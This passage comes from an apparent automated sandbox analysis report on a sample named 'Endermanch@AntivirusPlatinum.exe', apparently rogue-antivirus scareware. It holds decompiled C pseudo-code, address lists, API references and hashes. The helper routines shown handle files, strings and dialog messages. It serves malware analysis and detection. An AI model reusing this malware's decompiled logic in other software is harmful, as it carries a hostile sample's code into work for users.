                                                                                                                                                      							while( *(_t127 + 8) == 0xffffffff) {
                                                                                                                                                      								_t80 = E00404FDC(_t127 - 0x102c, _t110); // executed
                                                                                                                                                      								 *((intOrPtr*)(_t127 - 8)) = _t80;
                                                                                                                                                      								_t82 = E0040568A(_t127 - 0x102c, _t110, _t127 - 0x302c, 0x2000); // executed
                                                                                                                                                      								 *((intOrPtr*)(_t127 - 0xc)) = _t82;
                                                                                                                                                      								if(_t82 >= 0x10) {
                                                                                                                                                      									_t122 = 0;
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_t95 = _t127 + _t122 - 0x302c;
                                                                                                                                                      										if( *_t95 == 0x2a &&  *((char*)(_t127 + _t122 - 0x302b)) == 0x2a && E0040A53D(_t127 + _t122 - 0x302a, "*messages***", 0xb) == 0) {
                                                                                                                                                      											break;
                                                                                                                                                      										}
                                                                                                                                                      										if( *_t95 != 0x52 ||  *((char*)(_t127 + _t122 - 0x302b)) != 0x61 || E0040A53D(_t127 + _t122 - 0x302a, 0x412570, 4) != 0) {
                                                                                                                                                      											_t122 = _t122 + 1;
                                                                                                                                                      											if(_t122 <=  *((intOrPtr*)(_t127 - 0xc)) + 0xfffffff0) {
                                                                                                                                                      												continue;
                                                                                                                                                      											} else {
                                                                                                                                                      												L20:
                                                                                                                                                      												E004054ED(_t127 - 0x102c,  *((intOrPtr*)(_t127 - 0xc)) +  *((intOrPtr*)(_t127 - 8)) - 0x10, 0, 0);
                                                                                                                                                      												 *((intOrPtr*)(_t127 - 4)) =  *((intOrPtr*)(_t127 - 4)) + 1;
                                                                                                                                                      												if( *((intOrPtr*)(_t127 - 4)) < 0x40) {
                                                                                                                                                      													goto L8;
                                                                                                                                                      												} else {
                                                                                                                                                      													if( *(_t127 + 8) != 0xffffffff) {
                                                                                                                                                      														goto L22;
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										goto L43;
                                                                                                                                                      									}
                                                                                                                                                      									 *(_t127 + 8) = _t122 +  *((intOrPtr*)(_t127 - 8));
                                                                                                                                                      									goto L20;
                                                                                                                                                      								}
                                                                                                                                                      								L43:
                                                                                                                                                      								_t76 = E00405074(_t95, _t127 - 0x102c);
                                                                                                                                                      								goto L44;
                                                                                                                                                      							}
                                                                                                                                                      							L22:
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							_t95 = 0;
                                                                                                                                                      							 *((intOrPtr*)(_t125 + 4)) = 0x20000;
                                                                                                                                                      							E004054ED(_t127 - 0x102c,  *(_t127 + 8), _t110, 0);
                                                                                                                                                      							_t75 = E0040A1EC( *((intOrPtr*)(_t125 + 4)) + 0x400);
                                                                                                                                                      							 *_t125 = _t75;
                                                                                                                                                      							if(_t75 != 0) {
                                                                                                                                                      								 *((char*)(_t75 +  *((intOrPtr*)(_t125 + 4)))) = 0;
                                                                                                                                                      								_t77 = E0040568A(_t127 - 0x102c, _t110,  *_t125,  *((intOrPtr*)(_t125 + 4)));
                                                                                                                                                      								_t104 = 0;
                                                                                                                                                      								 *((intOrPtr*)(_t125 + 4)) = _t77;
                                                                                                                                                      								if(_t77 > 0) {
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_t79 =  *_t125;
                                                                                                                                                      										_t111 =  *((char*)(_t79 + _t95));
                                                                                                                                                      										_t95 = _t95 + 1;
                                                                                                                                                      										if(_t111 == 0) {
                                                                                                                                                      											goto L42;
                                                                                                                                                      										}
                                                                                                                                                      										if(_t111 != 0x5c) {
                                                                                                                                                      											if(_t111 == 0xd || _t111 == 0xa) {
                                                                                                                                                      												_t111 = 0xc;
                                                                                                                                                      											}
                                                                                                                                                      											goto L40;
                                                                                                                                                      										} else {
                                                                                                                                                      											_t116 =  *((char*)(_t79 + _t95)) - 0x22;
                                                                                                                                                      											if(_t116 == 0) {
                                                                                                                                                      												 *((char*)(_t79 + _t104)) = 0x22;
                                                                                                                                                      												goto L36;
                                                                                                                                                      											} else {
                                                                                                                                                      												_t117 = _t116 - 0x3a;
                                                                                                                                                      												if(_t117 == 0) {
                                                                                                                                                      													 *((char*)(_t79 + _t104)) = 0x5c;
                                                                                                                                                      													goto L36;
                                                                                                                                                      												} else {
                                                                                                                                                      													_t118 = _t117 - 0x12;
                                                                                                                                                      													if(_t118 == 0) {
                                                                                                                                                      														 *((char*)(_t79 + _t104)) = 0xa;
                                                                                                                                                      														goto L36;
                                                                                                                                                      													} else {
                                                                                                                                                      														_t119 = _t118 - 4;
                                                                                                                                                      														if(_t119 == 0) {
                                                                                                                                                      															 *((char*)(_t79 + _t104)) = 0xd;
                                                                                                                                                      															goto L36;
                                                                                                                                                      														} else {
                                                                                                                                                      															if(_t119 != 0) {
                                                                                                                                                      																L40:
                                                                                                                                                      																 *((char*)(_t79 + _t104)) = _t111;
                                                                                                                                                      															} else {
                                                                                                                                                      																 *((char*)(_t79 + _t104)) = 9;
                                                                                                                                                      																L36:
                                                                                                                                                      																_t95 = _t95 + 1;
                                                                                                                                                      															}
                                                                                                                                                      														}
                                                                                                                                                      													}
                                                                                                                                                      												}
                                                                                                                                                      											}
                                                                                                                                                      										}
                                                                                                                                                      										_t104 = _t104 + 1;
                                                                                                                                                      										if(_t95 <  *((intOrPtr*)(_t125 + 4))) {
                                                                                                                                                      											continue;
                                                                                                                                                      										}
                                                                                                                                                      										goto L42;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								L42:
                                                                                                                                                      								 *((char*)(_t104 +  *_t125)) = 0;
                                                                                                                                                      								 *((intOrPtr*)(_t125 + 4)) = _t104;
                                                                                                                                                      							}
                                                                                                                                                      							goto L43;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t76 = E00405074(_t95, _t127 - 0x102c);
                                                                                                                                                      						}
                                                                                                                                                      						L44:
                                                                                                                                                      					} else {
                                                                                                                                                      						GetModuleFileNameA(0, _t66, 0x400);
                                                                                                                                                      						_t76 = E0040A3D9(_t97, _t127 - 0x40c, 0x5c);
                                                                                                                                                      						if(_t76 != 0) {
                                                                                                                                                      							_t66 = _t76 + 1;
                                                                                                                                                      							goto L5;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return _t76;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *_t63 =  *_t63 + _t63;
                                                                                                                                                      					return _t63;
                                                                                                                                                      				}
                                                                                                                                                      			}

























                                                                                                                                                      0x0040928c
                                                                                                                                                      0x0040928c
                                                                                                                                                      0x0040928c
                                                                                                                                                      0x0040928e
                                                                                                                                                      0x0040929f
                                                                                                                                                      0x004092a3
                                                                                                                                                      0x004092a6
                                                                                                                                                      0x004092a8
                                                                                                                                                      0x004092af
                                                                                                                                                      0x004092b5
                                                                                                                                                      0x004092dc
                                                                                                                                                      0x004092e0
                                                                                                                                                      0x004092ec
                                                                                                                                                      0x00409304
                                                                                                                                                      0x0040930b
                                                                                                                                                      0x0040931d
                                                                                                                                                      0x00409321
                                                                                                                                                      0x00409324
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409325
                                                                                                                                                      0x00409335
                                                                                                                                                      0x0040933a
                                                                                                                                                      0x0040934f
                                                                                                                                                      0x00409354
                                                                                                                                                      0x0040935a
                                                                                                                                                      0x00409360
                                                                                                                                                      0x00409362
                                                                                                                                                      0x00409362
                                                                                                                                                      0x0040936c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409393
                                                                                                                                                      0x004093be
                                                                                                                                                      0x004093c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093c6
                                                                                                                                                      0x004093d0
                                                                                                                                                      0x004093e5
                                                                                                                                                      0x004093ea
                                                                                                                                                      0x004093f1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093f7
                                                                                                                                                      0x004093fb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093fb
                                                                                                                                                      0x004093f1
                                                                                                                                                      0x004093c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409393
                                                                                                                                                      0x004093cd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004093cd
                                                                                                                                                      0x004094bd
                                                                                                                                                      0x004094c3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094c8
                                                                                                                                                      0x00409401
                                                                                                                                                      0x00409404
                                                                                                                                                      0x00409405
                                                                                                                                                      0x00409410
                                                                                                                                                      0x00409417
                                                                                                                                                      0x00409425
                                                                                                                                                      0x0040942a
                                                                                                                                                      0x0040942e
                                                                                                                                                      0x00409437
                                                                                                                                                      0x00409445
                                                                                                                                                      0x0040944a
                                                                                                                                                      0x0040944e
                                                                                                                                                      0x00409451
                                                                                                                                                      0x00409453
                                                                                                                                                      0x00409453
                                                                                                                                                      0x00409455
                                                                                                                                                      0x00409459
                                                                                                                                                      0x0040945c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409461
                                                                                                                                                      0x004094a1
                                                                                                                                                      0x004094aa
                                                                                                                                                      0x004094aa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409463
                                                                                                                                                      0x00409467
                                                                                                                                                      0x0040946a
                                                                                                                                                      0x00409497
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040946c
                                                                                                                                                      0x0040946c
                                                                                                                                                      0x0040946f
                                                                                                                                                      0x00409491
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409471
                                                                                                                                                      0x00409471
                                                                                                                                                      0x00409474
                                                                                                                                                      0x0040948b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409476
                                                                                                                                                      0x00409476
                                                                                                                                                      0x00409479
                                                                                                                                                      0x00409485
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040947b
                                                                                                                                                      0x0040947d
                                                                                                                                                      0x004094ab
                                                                                                                                                      0x004094ab
                                                                                                                                                      0x0040947f
                                                                                                                                                      0x0040947f
                                                                                                                                                      0x0040949b
                                                                                                                                                      0x0040949b
                                                                                                                                                      0x0040949b
                                                                                                                                                      0x0040947d
                                                                                                                                                      0x00409479
                                                                                                                                                      0x00409474
                                                                                                                                                      0x0040946f
                                                                                                                                                      0x0040946a
                                                                                                                                                      0x004094ae
                                                                                                                                                      0x004094b2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094b2
                                                                                                                                                      0x00409453
                                                                                                                                                      0x004094b4
                                                                                                                                                      0x004094b6
                                                                                                                                                      0x004094ba
                                                                                                                                                      0x004094ba
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040930d
                                                                                                                                                      0x00409313
                                                                                                                                                      0x00409313
                                                                                                                                                      0x004094c9
                                                                                                                                                      0x004092b7
                                                                                                                                                      0x004092bf
                                                                                                                                                      0x004092ce
                                                                                                                                                      0x004092d5
                                                                                                                                                      0x004092db
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004092db
                                                                                                                                                      0x004092d5
                                                                                                                                                      0x004094cc
                                                                                                                                                      0x00409290
                                                                                                                                                      0x00409290
                                                                                                                                                      0x00409292
                                                                                                                                                      0x00409292

                                                                                                                                                      APIs
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,0000005C,00414C88,?,004098EC,?,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D3F9,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 004092BF
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileModuleName
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 514040917-0
                                                                                                                                                      • Opcode ID: 8a059818d79f815d1da1c0fdc08b2b0f8e86ca2838fa7738cf816effd15a2a51
                                                                                                                                                      • Instruction ID: 5e47cf0ed6a20ba9c8d57e52932549557f7a3f3f30f472f0507eb0aadce207e7
                                                                                                                                                      • Opcode Fuzzy Hash: 8a059818d79f815d1da1c0fdc08b2b0f8e86ca2838fa7738cf816effd15a2a51
                                                                                                                                                      • Instruction Fuzzy Hash: 3A0184B6500204A9DF20A721DD45EEF3778DB95344F0045BBFB46F50C2DA789D49CD69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406045(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                      				void* _t12;
                                                                                                                                                      				intOrPtr _t19;
                                                                                                                                                      
                                                                                                                                                      				_t19 = _a12;
                                                                                                                                                      				 *((char*)(_t19 + 0x109c)) = 0;
                                                                                                                                                      				if(E00407279(__ecx, _a4, _a8) == 0) {
                                                                                                                                                      					_t12 = E00405C10(__ecx, __edx, __eflags, 0xffffffff, _a4, _a8, _t19);
                                                                                                                                                      					__eflags = _t12 - 0xffffffff;
                                                                                                                                                      					if(_t12 == 0xffffffff) {
                                                                                                                                                      						goto L1;
                                                                                                                                                      					}
                                                                                                                                                      					FindClose(_t12); // executed
                                                                                                                                                      					_t8 = _t19 + 0x1098;
                                                                                                                                                      					 *_t8 =  *(_t19 + 0x1098) & 0x00000000;
                                                                                                                                                      					__eflags =  *_t8;
                                                                                                                                                      					 *((char*)(_t19 + 0xc10)) = E0040579E( *((intOrPtr*)(_t19 + 0xc08)));
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      				L1:
                                                                                                                                                      				return 0;
                                                                                                                                                      			}





                                                                                                                                                      0x0040604c
                                                                                                                                                      0x00406052
                                                                                                                                                      0x00406060
                                                                                                                                                      0x0040606f
                                                                                                                                                      0x00406074
                                                                                                                                                      0x00406077
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040607a
                                                                                                                                                      0x00406086
                                                                                                                                                      0x00406086
                                                                                                                                                      0x00406086
                                                                                                                                                      0x00406092
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00406098
                                                                                                                                                      0x00406062
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,?,?,?,004049B4,?,?,?,00000000,?,?), ref: 0040607A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                      • Opcode ID: 016139225d3950fc2726837b29d2660fc3c0a39c7cd46741710581f0b07a340e
                                                                                                                                                      • Instruction ID: 1ba89066e6b26492de0991d89586bb912489ebcd511f1a1df6c7eb89e8bf18c6
                                                                                                                                                      • Opcode Fuzzy Hash: 016139225d3950fc2726837b29d2660fc3c0a39c7cd46741710581f0b07a340e
                                                                                                                                                      • Instruction Fuzzy Hash: CAF0E931004744B7CF215FB58805AD73F54EF02334F008A1AF9BD262D2C67661A4EB75
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00405051(void* __ecx) {
                                                                                                                                                      				void* _t2;
                                                                                                                                                      				long _t3;
                                                                                                                                                      
                                                                                                                                                      				_t2 =  *(__ecx + 4);
                                                                                                                                                      				if(_t2 != 0xffffffff) {
                                                                                                                                                      					_t3 = GetFileType(_t2); // executed
                                                                                                                                                      					if(_t3 == 2 || _t3 == 3) {
                                                                                                                                                      						return 1;
                                                                                                                                                      					} else {
                                                                                                                                                      						return 0;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      			}





                                                                                                                                                      0x00405051
                                                                                                                                                      0x00405057
                                                                                                                                                      0x0040505d
                                                                                                                                                      0x00405066
                                                                                                                                                      0x00405073
                                                                                                                                                      0x0040506d
                                                                                                                                                      0x0040506f
                                                                                                                                                      0x0040506f
                                                                                                                                                      0x00405059
                                                                                                                                                      0x0040505b
                                                                                                                                                      0x0040505b

                                                                                                                                                      APIs
                                                                                                                                                      • GetFileType.KERNELBASE(?,00405318,?,004056BF,000000FF,?,00000000,?,00000000), ref: 0040505D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileType
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3081899298-0
                                                                                                                                                      • Opcode ID: 9ef2e2e64e8ea27a378ea434a61d5314f25fa8d2862a00f2364391826e643227
                                                                                                                                                      • Instruction ID: 1aa453c7d0f86835216dbc810814f2ca778ec8b6d3a3a4ed52031c25ee967b21
                                                                                                                                                      • Opcode Fuzzy Hash: 9ef2e2e64e8ea27a378ea434a61d5314f25fa8d2862a00f2364391826e643227
                                                                                                                                                      • Instruction Fuzzy Hash: DDC0127091094451CE609538494D45F2346D7433667684BB2E025D12E4CF38CC82FC45
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040BB29(CHAR* _a8, char _a12) {
                                                                                                                                                      				char _v1028;
                                                                                                                                                      				void* _t9;
                                                                                                                                                      
                                                                                                                                                      				wvsprintfA( &_v1028, _a8,  &_a12);
                                                                                                                                                      				_t9 = E0040AD46(0,  &_v1028); // executed
                                                                                                                                                      				return _t9;
                                                                                                                                                      			}





                                                                                                                                                      0x0040bb40
                                                                                                                                                      0x0040bb4f
                                                                                                                                                      0x0040bb55

                                                                                                                                                      APIs
                                                                                                                                                      • wvsprintfA.USER32(?,?,00000000), ref: 0040BB40
                                                                                                                                                        • Part of subcall function 0040AD46: GetDlgItem.USER32 ref: 0040AD57
                                                                                                                                                        • Part of subcall function 0040AD46: ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0040AE8F), ref: 0040AD84
                                                                                                                                                        • Part of subcall function 0040AD46: SendMessageA.USER32 ref: 0040AD90
                                                                                                                                                        • Part of subcall function 0040AD46: SendMessageA.USER32 ref: 0040AD9F
                                                                                                                                                        • Part of subcall function 0040AD46: SendMessageA.USER32 ref: 0040ADB3
                                                                                                                                                        • Part of subcall function 0040AD46: SendMessageA.USER32 ref: 0040ADCA
                                                                                                                                                        • Part of subcall function 0040AD46: SendMessageA.USER32 ref: 0040AE05
                                                                                                                                                        • Part of subcall function 0040AD46: SendMessageA.USER32 ref: 0040AE14
                                                                                                                                                        • Part of subcall function 0040AD46: SendMessageA.USER32 ref: 0040AE1C
                                                                                                                                                        • Part of subcall function 0040AD46: SendMessageA.USER32 ref: 0040AE40
                                                                                                                                                        • Part of subcall function 0040AD46: SendMessageA.USER32 ref: 0040AE51
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: MessageSend$ItemShowWindowwvsprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3976247692-0
                                                                                                                                                      • Opcode ID: 5f134b3a6a48b1da08cc8969ca167bcf95950b867095aa8a3e93a4b6447c38e7
                                                                                                                                                      • Instruction ID: 42f10b7e191d8a10b733246c62dab6ef4ab6fe2402209f352080973538f3fee1
                                                                                                                                                      • Opcode Fuzzy Hash: 5f134b3a6a48b1da08cc8969ca167bcf95950b867095aa8a3e93a4b6447c38e7
                                                                                                                                                      • Instruction Fuzzy Hash: 80D09EB540420E6BDF10EB90DC45FE9777DBB0430DF0440A5BB15E6080D674D61A8B69
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B283(intOrPtr _a4, intOrPtr _a12) {
                                                                                                                                                      				long _t4;
                                                                                                                                                      
                                                                                                                                                      				_t4 = SendDlgItemMessageA( *0x419f80, 0x68, 0x402, E0040A8F1(_a4, _a12), 0); // executed
                                                                                                                                                      				return _t4;
                                                                                                                                                      			}




                                                                                                                                                      0x0040b2a0
                                                                                                                                                      0x0040b2a6

                                                                                                                                                      APIs
                                                                                                                                                      • SendDlgItemMessageA.USER32(00000068,00000402,00000000,?,?), ref: 0040B2A0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ItemMessageSend
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3015471070-0
                                                                                                                                                      • Opcode ID: 0d12b71308204e384a32f16a7f63ddf877073e16bb697978e336ecb594957348
                                                                                                                                                      • Instruction ID: 6849b772ee6339a491bc1e2b639edc61c43db45e96c8e4cd59dca12df05aa9dd
                                                                                                                                                      • Opcode Fuzzy Hash: 0d12b71308204e384a32f16a7f63ddf877073e16bb697978e336ecb594957348
                                                                                                                                                      • Instruction Fuzzy Hash: EFC01231280301BBEB02AB009D0AF5A3A22BB80700F00C928F340A40F1CBB20831EA19
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 28%
                                                                                                                                                      			_entry_(void* __eflags) {
                                                                                                                                                      				void* _t3;
                                                                                                                                                      
                                                                                                                                                      				E0040A6C0(_t3);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push(0);
                                                                                                                                                      				_push(0); // executed
                                                                                                                                                      				E0040D33C(); // executed
                                                                                                                                                      				return 0;
                                                                                                                                                      			}




                                                                                                                                                      0x0040a7d8
                                                                                                                                                      0x0040a7df
                                                                                                                                                      0x0040a7e0
                                                                                                                                                      0x0040a7e1
                                                                                                                                                      0x0040a7e2
                                                                                                                                                      0x0040a7e3
                                                                                                                                                      0x0040a7e8

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Module$EnvironmentFileLoadNameVariable$BitmapCommandDeleteDialogHandleIconInitializeLineObjectParam
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 376930393-0
                                                                                                                                                      • Opcode ID: c41b5129d60273e9029d0afe8789ae86aa97bb8e615f6db8ce5cba5aaf9764ec
                                                                                                                                                      • Instruction ID: 281e6f1e172df0da2b3e58d9bfa8b28dbafe7f6c866a4f4aacb9b346c6845e1d
                                                                                                                                                      • Opcode Fuzzy Hash: c41b5129d60273e9029d0afe8789ae86aa97bb8e615f6db8ce5cba5aaf9764ec
                                                                                                                                                      • Instruction Fuzzy Hash: 20A002C49242407CF94075F20E07D3B005CD5402083C51C7B3C44F1092D8BD9C14003B
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                      			E0040503E(void* __ecx) {
                                                                                                                                                      				int _t2;
                                                                                                                                                      
                                                                                                                                                      				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
                                                                                                                                                      				asm("sbb eax, eax");
                                                                                                                                                      				return  ~(_t2 - 1) + 1;
                                                                                                                                                      			}




                                                                                                                                                      0x00405041
                                                                                                                                                      0x0040504a
                                                                                                                                                      0x0040504d

                                                                                                                                                      APIs
                                                                                                                                                      • SetEndOfFile.KERNELBASE(?,004046B2,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00405041
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 749574446-0
